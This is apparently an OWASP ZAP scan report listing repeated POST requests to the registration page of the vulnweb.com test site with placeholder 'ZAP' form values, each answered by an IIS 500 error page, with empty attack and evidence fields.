HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
